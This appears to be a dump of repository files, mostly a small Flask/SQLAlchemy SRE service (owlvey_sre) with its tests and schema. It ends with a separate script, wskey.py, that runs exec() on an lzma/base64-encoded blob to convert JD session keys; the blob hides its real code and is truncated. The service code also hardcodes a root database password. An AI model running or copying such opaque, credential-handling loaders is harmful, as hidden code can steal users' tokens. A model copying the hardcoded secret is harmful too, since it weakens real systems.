"text": "import unittest\nfrom app.components.UsersComponent import UsersComponent\nfrom testing.DataSeed import DataSeed\n\n\nclass TestUsersComponent(unittest.TestCase):\n\n def setUp(self):\n self.component = UsersComponent()\n\n def test_maintenance(self):\n\n email = DataSeed.generate_name(\"account{}@email.com\")\n\n self.component.create({\"email\": email})\n\n users = self.component.list()\n\n self.assertTrue(users)\n\n user = self.component.get(users[0][\"id\"])\n\n user[\"email\"] = \"change\"\n\n self.component.update(user)\n\n user = self.component.get(user[\"id\"])\n\n self.assertEqual(user[\"email\"], \"change\")\n\n self.component.delete(user[\"id\"])\n\n user = self.component.get(user[\"id\"])\n\n self.assertFalse(user)\n\n\n"
},
{
"alpha_fraction": 0.6753246784210205,
"alphanum_fraction": 0.6753246784210205,
"avg_line_length": 35.235294342041016,
"blob_id": "96dab07392f889d63c0525ee6654bf9ed2823bfc",
"content_id": "2b1f130a786f24fa976b347020a3ac480ca5e2d1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 616,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 17,
"path": "/app/components/SubscriptionsComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.SubscriptionEntity import SubscriptionEntity\n\n\nclass SubscriptionsComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return SubscriptionEntity()\n\n def get_by_customer_user(self, customer_id, user_id):\n item = SubscriptionEntity.query.filter(SubscriptionEntity.customer_id == customer_id and\n SubscriptionEntity.user_id == user_id).first()\n return item.to_dict()\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7412280440330505,
"avg_line_length": 24.22222137451172,
"blob_id": "6d85f6257374b00fd4afe433de83ae0fe3a21f2a",
"content_id": "ace276ee5ba17617c8e88121774786decaa2f388",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 228,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 9,
"path": "/unittest.bash",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\npython3 -m unittest discover testing/unittest\n\ncoverage run -m unittest discover -s testing/unittest\n\ncoverage report -m --omit=\"*/test*\"\n\ncoverage html --omit=\"*/test*\" -d reports/unittest_coverage_report\n\n"
},
{
"alpha_fraction": 0.6500711441040039,
"alphanum_fraction": 0.670697033405304,
"avg_line_length": 19.39130401611328,
"blob_id": "1f3851e4f1325e717291099ad1f13354b0c2bc89",
"content_id": "125cb4179c2e17a71f97558c512c6dd7ae1b9f3b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1406,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 69,
"path": "/database/sql/V1_1__Initial_Setup.sql",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "create table Users(\n user_id int not null AUTO_INCREMENT,\n email varchar(512),\n PRIMARY KEY(user_id)\n);\n\ninsert into Users(email) values('[email protected]');\n\ncreate table Customers(\n customer_id int,\n name varchar(256),\n PRIMARY KEY(customer_id)\n);\n\ncreate table CustomersUsers(\n customer_user_id int,\n customer_id int,\n user_id int,\n PRIMARY KEY(customer_user_id)\n);\n\ncreate table Products(\n product_id int,\n customer_id int,\n name varchar(256),\n PRIMARY KEY(product_id),\n FOREIGN KEY(customer_id) REFERENCES Customers(customer_id)\n);\n\ncreate table Services(\n service_id int,\n product_id int,\n name varchar(256),\n PRIMARY KEY(service_id),\n FOREIGN KEY(product_id)REFERENCES Products(product_id)\n);\n\ncreate table Squads(\n squad_id int,\n customer_id int,\n name varchar(256),\n PRIMARY KEY(squad_id),\n FOREIGN KEY(customer_id) REFERENCES Customers(customer_id)\n);\n\ncreate table Features(\n feature_id int,\n name varchar(256),\n PRIMARY KEY(feature_id)\n);\n\ncreate table Sources(\n source_id int,\n name varchar(256),\n good_definition varchar(2024),\n total_definition varchar(2024),\n PRIMARY KEY(source_id)\n);\n\ncreate table Events(\n event_id int,\n source_id int,\n good int,\n total int,\n start_date DATE,\n end_date DATE,\n PRIMARY KEY(event_id),\n FOREIGN KEY(source_id) REFERENCES Sources(source_id)\n);"
},
{
"alpha_fraction": 0.6133333444595337,
"alphanum_fraction": 0.6355555653572083,
"avg_line_length": 25.41176414489746,
"blob_id": "20211b4ef221a2cc8c490f854f05950cc92a7388",
"content_id": "23aa405f9ccc2a484d84e7d6b60b271e517caf3b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 450,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 17,
"path": "/testing/system_test/test_customers_api.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\nimport requests\n\n\nclass TestCustomersApi(unittest.TestCase):\n\n def setUp(self):\n self.url = \"http://localhost:5000\"\n\n def test_maintenance(self):\n response = requests.get(self.url + \"/customers\")\n self.assertEqual(200, response.status_code)\n\n response = requests.post(self.url + \"/customers\", json={\n \"name\": \"customer_test\"\n })\n self.assertEqual(200, response.status_code)\n\n"
},
{
"alpha_fraction": 0.6542056202888489,
"alphanum_fraction": 0.6542056202888489,
"avg_line_length": 15.894737243652344,
"blob_id": "d706aaf98e51c1106277f9bac122e0d38b2e35ce",
"content_id": "699814f905b331037b5512613290e0648b79ea49",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 321,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 19,
"path": "/app/core/BaseFrame.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from typing import abstractmethod\n\n\nclass BaseFrame:\n\n def __init__(self):\n pass\n\n @abstractmethod\n def get_metadata(self): pass\n\n @abstractmethod\n def get_schema(self): pass\n\n @abstractmethod\n def load_data(self, data): pass\n\n @abstractmethod\n def to_dict(self, orient=\"records\"): pass\n"
},
{
"alpha_fraction": 0.6494117379188538,
"alphanum_fraction": 0.6494117379188538,
"avg_line_length": 21.3157901763916,
"blob_id": "1071c0b47056a42c5dcce3c1d78d0120af8f4393",
"content_id": "863b1c0186f4bbd27f5926dac208f2ce15650330",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 19,
"path": "/app/repositories/EntityRepository.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.core.BaseEntity import BaseEntity\nfrom app.repositories.database import db_session\n\n\nclass EntityRepository:\n\n def __init__(self):\n pass\n\n def create(self, data: BaseEntity):\n db_session.add(data)\n db_session.commit()\n\n def delete(self, data: BaseEntity):\n db_session.delete(data)\n db_session.commit()\n\n def update(self, data: BaseEntity):\n db_session.commit()\n\n"
},
{
"alpha_fraction": 0.6089324355125427,
"alphanum_fraction": 0.6187363862991333,
"avg_line_length": 29.366666793823242,
"blob_id": "820dcfbe87cda5f36a41411c95bf3da27bca5082",
"content_id": "a6bd1f0f2d1b2014076433fa3946477c4956b746",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 918,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 30,
"path": "/testing/unittest/test_customer_entity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom app.core.CustomerEntity import CustomerEntity\nfrom app.core.UserEntity import UserEntity\n\n\nclass TestCustomerEntity(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_maintenance(self):\n entity = CustomerEntity()\n entity.from_dict({\"id\": 123, \"name\": \"[email protected]\"}, force=True)\n self.assertEqual(entity.name, \"[email protected]\")\n self.assertEqual(entity.id, 123)\n\n def test_from_dict_detect(self):\n entity = CustomerEntity()\n self.assertRaises(ValueError,\n lambda: entity.from_dict({\"id\": 123, \"email\": \"[email protected]\"}, force=True))\n\n def test_validate_avatar(self):\n entity = CustomerEntity()\n entity.create(\"email@test\")\n\n def test_validate_name_none(self):\n entity = CustomerEntity()\n self.assertRaises(ValueError,\n lambda: entity.create(None, avatar=\"\"))\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6520916819572449,
"alphanum_fraction": 0.653509795665741,
"avg_line_length": 41.45454406738281,
"blob_id": "fb214a61e2d3c5911fda22228455b1363f405a02",
"content_id": "695aaa6e0461e76c61071ca51f2a0be3916e134e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4231,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 99,
"path": "/testing/manual_test/test_owlvey_basic.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\nimport itertools\nimport os\nfrom app.components.CustomersComponent import CustomersComponent\nfrom app.components.FeaturesComponent import FeaturesComponent\nfrom app.components.ProductsComponent import ProductsComponent\nfrom app.components.ServicesComponent import ServicesComponent\nfrom app.components.SquadsComponent import SquadsComponent\nfrom app.components.SubscriptionsComponent import SubscriptionsComponent\nfrom app.components.UsersComponent import UsersComponent\n\n\nclass TestOwlveyBasic(unittest.TestCase):\n\n def setUp(self):\n self.current_dir = os.getcwd()\n\n def build_squads(self):\n squads = [\"naboo\", \"coruscant\"]\n squad_component = SquadsComponent()\n for squad in squads:\n squad_component.create({\"name\": squad})\n\n def test_maintenance(self):\n\n customer_component = CustomersComponent()\n customers = [\"bcp\", \"jpmorgan\", \"scotiabank\"]\n\n for customer in customers:\n customer_component.create({\"name\": customer})\n\n users = [\"[email protected]\", \"[email protected]\", \"[email protected]\"]\n\n users_component = UsersComponent()\n for user in users:\n users_component.create({\"email\": user})\n\n items = itertools.product(customers, users)\n\n subscription_component = SubscriptionsComponent()\n\n for item in list(items):\n tmp_customer = customer_component.get_by_name(item[0])\n tmp_user = users_component.get_by_email(item[1])\n subscription_component.create(\n {\n \"user_id\": tmp_user[\"id\"],\n \"customer_id\": tmp_customer[\"id\"]\n }\n )\n\n self.build_squads()\n\n products = [\"blue\", \"yellow\", \"red\"]\n product_component = ProductsComponent()\n\n items = list(itertools.product(customers, products))\n\n for item in list(items):\n tmp_customer = customer_component.get_by_name(item[0])\n product_component.create({\"name\": item[1], \"customer_id\": tmp_customer[\"id\"]})\n\n services = [\"registration\", \"payments\", \"loans\", \"campaigns\"]\n\n service_component = ServicesComponent()\n feature_component = FeaturesComponent()\n\n features = [\"otp\", \"login\", \"search account\", \"make payment\", \"rapid cash\"]\n\n for item in items:\n tmp_customer = customer_component.get_by_name(item[0])\n tmp_product = product_component.get_by_customer_id_name(tmp_customer[\"id\"], item[1])\n for service in services:\n service_component.create({\"name\": service, \"product_id\": tmp_product[\"id\"]})\n\n for feature in features:\n feature_component.create({\"name\": feature, \"product_id\": tmp_product[\"id\"]})\n\n registration_service = service_component.get_by_name(\"registration\")\n payment_service = service_component.get_by_name(\"payments\")\n campaigns_service = service_component.get_by_name(\"campaigns\")\n\n otp_feature = feature_component.get_by_name(\"otp\")\n login_feature = feature_component.get_by_name(\"login\")\n search_feature = feature_component.get_by_name(\"search account\")\n make_payment_feature = feature_component.get_by_name(\"make payment\")\n rapid_cash_feature = feature_component.get_by_name(\"rapid cash\")\n\n service_component.register_feature(registration_service[\"id\"], otp_feature[\"id\"])\n service_component.register_feature(registration_service[\"id\"], login_feature[\"id\"])\n service_component.register_feature(payment_service[\"id\"], otp_feature[\"id\"])\n service_component.register_feature(payment_service[\"id\"], login_feature[\"id\"])\n service_component.register_feature(payment_service[\"id\"], search_feature[\"id\"])\n service_component.register_feature(payment_service[\"id\"], make_payment_feature[\"id\"])\n\n service_component.register_feature(campaigns_service[\"id\"], otp_feature[\"id\"])\n service_component.register_feature(campaigns_service[\"id\"], login_feature[\"id\"])\n service_component.register_feature(campaigns_service[\"id\"], search_feature[\"id\"])\n service_component.register_feature(campaigns_service[\"id\"], rapid_cash_feature[\"id\"])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.4540901482105255,
"alphanum_fraction": 0.4540901482105255,
"avg_line_length": 32.27777862548828,
"blob_id": "07134b9fad790e564a4b218512652d992340bc25",
"content_id": "dc87db77e504f89ef3083c894bac97335a045121",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 599,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 18,
"path": "/app/components/ConfigurationComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import os\n\n\nclass ConfigurationComponent:\n def __init__(self):\n self.db_username = \"root\"\n self.db_password = \"p@ssw0rd\"\n self.db_name = \"sredb\"\n self.db_host = \"localhost\"\n\n def get_environment(self):\n return os.environ.get(\"environment\") or None\n\n def build_db_connection(self):\n return 'mysql+pymysql://{}:{}@{}/{}'.format(self.db_username,\n self.db_password,\n self.db_host,\n self.db_name)\n"
},
{
"alpha_fraction": 0.7571428418159485,
"alphanum_fraction": 0.7571428418159485,
"avg_line_length": 36.4878044128418,
"blob_id": "aa497db97d75b8013277e73faa2c79e3a807502f",
"content_id": "c9a054c824ad1bf86b171383e5bda6ae2ede071c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1540,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 41,
"path": "/app/repositories/database.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import threading\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom app.core.QueryEntity import QueryEntity\nfrom app.components.ConfigurationComponent import ConfigurationComponent\n\n# add reference to register automatic creation\n\nfrom app.core.UserEntity import UserEntity\nfrom app.core.CustomerEntity import CustomerEntity\nfrom app.core.SubscriptionEntity import SubscriptionEntity\nfrom app.core.SquadEntity import SquadEntity\nfrom app.core.ProductEntity import ProductEntity\nfrom app.core.FeatureEntity import FeatureEntity\nfrom app.core.ServiceEntity import ServiceEntity\nfrom app.core.ServiceFeatureEntity import ServiceFeatureEntity\n\nconfiguration = ConfigurationComponent()\n\nif configuration.get_environment() == \"prod\":\n engine = create_engine(configuration.build_db_connection(), convert_unicode=True)\nelif configuration.get_environment() == \"dev\":\n engine = create_engine('sqlite:///dev.db')\n QueryEntity.metadata.create_all(bind=engine)\nelif configuration.get_environment() == \"manual\":\n engine = create_engine('sqlite:///manual.db')\n QueryEntity.metadata.create_all(bind=engine)\nelse:\n engine = create_engine('sqlite://')\n QueryEntity.metadata.create_all(bind=engine)\n\ndb_session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=engine))\n\nQueryEntity.query = db_session.query_property()\n\n\ndef db_init():\n QueryEntity.metadata.create_all(bind=engine)\n\n\n\n"
},
{
"alpha_fraction": 0.6622073650360107,
"alphanum_fraction": 0.6789297461509705,
"avg_line_length": 22,
"blob_id": "2cdf8026cc0c548558a90f5a4de977daa2d3bfa5",
"content_id": "8aefa6817131d95e5f5debc0c3fef0666298d0ed",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 897,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 39,
"path": "/app/controllers/SourcesController.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint, request, make_response\nfrom app.components.ServicesComponent import ServicesComponent\n\n\napi = Blueprint('sources_api', __name__)\n\ncomponent = ServicesComponent()\n\nurl_prefix = \"/sources\"\n\n\[email protected](url_prefix, methods=[\"GET\"])\ndef list_items():\n return make_response({\"data\": component.list()}, 200)\n\n\[email protected](url_prefix + \"/<key>\", methods=[\"GET\"])\ndef get_item(key):\n return make_response(component.get(key), 200)\n\n\[email protected](url_prefix, methods=[\"POST\"])\ndef create():\n data = request.get_json()\n component.create(data)\n return make_response({}, 200)\n\n\[email protected](url_prefix, methods=[\"PUT\"])\ndef update():\n data = request.get_json()\n result = component.update(data)\n return make_response(result, 200)\n\n\[email protected](url_prefix + \"/<key>\", methods=[\"DELETE\"])\ndef delete(key):\n component.delete(key)\n return make_response({}, 200)\n"
},
{
"alpha_fraction": 0.6614583134651184,
"alphanum_fraction": 0.6614583134651184,
"avg_line_length": 32.882354736328125,
"blob_id": "5767ddcce8f5e9743ce59cb14f354ffc2939ca8a",
"content_id": "c4263f1dcdd7a57c64172c9feaf4cecd253c9651",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 576,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 17,
"path": "/app/components/ProductsComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.ProductEntity import ProductEntity\n\n\nclass ProductsComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return ProductEntity()\n\n def get_by_customer_id_name(self, customer_id, name):\n entity = ProductEntity.query.filter(ProductEntity.customer_id == customer_id\n and ProductEntity.name == name).first()\n return entity.to_dict()\n"
},
{
"alpha_fraction": 0.7377850413322449,
"alphanum_fraction": 0.7377850413322449,
"avg_line_length": 31.157894134521484,
"blob_id": "8f28bca837f65d26ad0a17cabb799164d9e0ff70",
"content_id": "87ef286bd23d9771f89d32e5b104d7c4358d934c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 614,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 19,
"path": "/app/components/ServicesComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.FeatureEntity import FeatureEntity\nfrom app.core.ServiceEntity import ServiceEntity\nfrom app.core.ServiceFeatureEntity import ServiceFeatureEntity\n\n\nclass ServicesComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return ServiceEntity()\n\n def register_feature(self, service_id, feature_id):\n entity = ServiceFeatureEntity()\n entity.create(service_id, feature_id)\n self._repository.create(entity)\n\n\n\n"
},
{
"alpha_fraction": 0.6938160061836243,
"alphanum_fraction": 0.6938160061836243,
"avg_line_length": 27.782608032226562,
"blob_id": "527433904c22525f6fb351a1c1deae3ce807d1c6",
"content_id": "a50bfa6293ffb2957bbf0d0d27b36aa0a713d630",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 663,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 23,
"path": "/app/core/ServiceFeatureEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from threading import Thread\n\nfrom sqlalchemy import Column, ForeignKey, Integer, String\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass ServiceFeatureEntity(BaseEntity, QueryEntity):\n __tablename__ = \"ServiceFeatures\"\n\n service_id = Column(Integer, ForeignKey('Services.id'))\n feature_id = Column(Integer, ForeignKey('Features.id'))\n\n def __init__(self):\n super().__init__()\n\n def create(self, service_id, feature_id):\n self.service_id = service_id\n self.feature_id = feature_id\n self._validate()\n\n def _read_fields(self):\n return ServiceFeatureEntity.id.name\n\n"
},
{
"alpha_fraction": 0.7678571343421936,
"alphanum_fraction": 0.7767857313156128,
"avg_line_length": 14.857142448425293,
"blob_id": "43b1ebe1b900d1117d02134b1bd860b18fead20c",
"content_id": "9a230accbed2bcb41d109d124caaf00788e426d3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 112,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 7,
"path": "/manualtest.bash",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\nrm manual.db\n\nexport environment=manual\n\npython3 -m unittest discover testing/manual_test\n\n"
},
{
"alpha_fraction": 0.7552238702774048,
"alphanum_fraction": 0.7552238702774048,
"avg_line_length": 46.03571319580078,
"blob_id": "ddab5f97ded38dd7448870a16ee4d2a4f0a5e983",
"content_id": "b533aa230c5d3e47686f8fb5b0daa5109dc96ea0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1340,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 28,
"path": "/testing/component_test/test_services_component.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom app.components.CustomersComponent import CustomersComponent\nfrom app.components.FeaturesComponent import FeaturesComponent\nfrom app.components.ProductsComponent import ProductsComponent\nfrom app.components.ServicesComponent import ServicesComponent\nfrom testing.DataSeed import DataSeed\nfrom testing.component_test.ComponentDataSeed import ComponentDataSeed\n\n\nclass TestServiceComponent(unittest.TestCase):\n\n def setUp(self):\n self.customer_component = CustomersComponent()\n self.product_component = ProductsComponent()\n self.service_component = ServicesComponent()\n self.feature_component = FeaturesComponent()\n\n def test_maintenance(self):\n name = DataSeed.generate_name(\"service_{}\")\n product = ComponentDataSeed.build_product(self.customer_component, self.product_component)\n self.service_component.create({\"name\": name, \"product_id\": product[\"id\"]})\n\n def test_feature_registration(self):\n product = ComponentDataSeed.build_product(self.customer_component, self.product_component)\n service = ComponentDataSeed.build_service(product, self.service_component)\n feature = ComponentDataSeed.build_feature(product, self.feature_component)\n self.service_component.register_feature(service[\"id\"], feature[\"id\"])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7310126423835754,
"alphanum_fraction": 0.7310126423835754,
"avg_line_length": 25.33333396911621,
"blob_id": "6c6955c7fd7260c71729090fe4f5426eb5c6f78b",
"content_id": "509f3458b6d88153b9879bb5c71ba7d467d097ea",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 316,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 12,
"path": "/app/components/FeaturesComponent.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from app.components.BaseComponent import BaseComponent\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.FeatureEntity import FeatureEntity\n\n\nclass FeaturesComponent(BaseComponent):\n\n def __init__(self):\n super().__init__()\n\n def _build_entity(self) -> BaseEntity:\n return FeatureEntity()\n"
},
{
"alpha_fraction": 0.6932907104492188,
"alphanum_fraction": 0.6932907104492188,
"avg_line_length": 28.761905670166016,
"blob_id": "a1e6f49a743682d02f5a5aa11892a1d71cb74c5a",
"content_id": "5500e40e6e1baf5bec811583fb7d6ecd90673424",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 626,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 21,
"path": "/app/core/JournalEntity.py",
"repo_name": "owlvey/owlvey_sre",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import Column, ForeignKey, Integer, String, DateTime\nfrom app.core.BaseEntity import BaseEntity\nfrom app.core.QueryEntity import QueryEntity\n\n\nclass JournalEntity(BaseEntity, QueryEntity):\n\n __tablename__ = \"Journals\"\n\n source_id = Column(Integer, ForeignKey('Sources.id'))\n good = Column(Integer, nullable=False)\n total = Column(Integer, nullable=False)\n start = Column(DateTime, nullable=False)\n end = Column(DateTime, nullable=False)\n\n def __init__(self, name=None):\n super().__init__()\n self.name = name\n\n def _read_fields(self):\n return JournalEntity.id.name\n\n"
}
] | 44 |
gjh000777/wskey | https://github.com/gjh000777/wskey | bc8a1957b9036b746f87abcd2c2e0f4ab8399aa7 | c43e4af6591421a3c278c1521d7cb22d236d1fd3 | 6279fb157c00ae1a60212756dac0f21dc5a55430 | refs/heads/main | 2023-07-25T23:03:10.603770 | 2021-09-04T07:29:32 | 2021-09-04T07:29:32 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5414012670516968,
"alphanum_fraction": 0.6050955653190613,
"avg_line_length": 13.272727012634277,
"blob_id": "20b121b42aea1daaeea02893199e4c90f212da12",
"content_id": "7974c9892cc651639d39bd1c867bc62662f2f902",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 161,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 11,
"path": "/wskey.py",
"repo_name": "gjh000777/wskey",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*\n'''\ncron: 15 */6 * * * wskey.py\nnew Env('wskey转换');\n'''\n\n\nimport base64\nimport lzma\n\nexec(lzma.decompress(base64.b64decode('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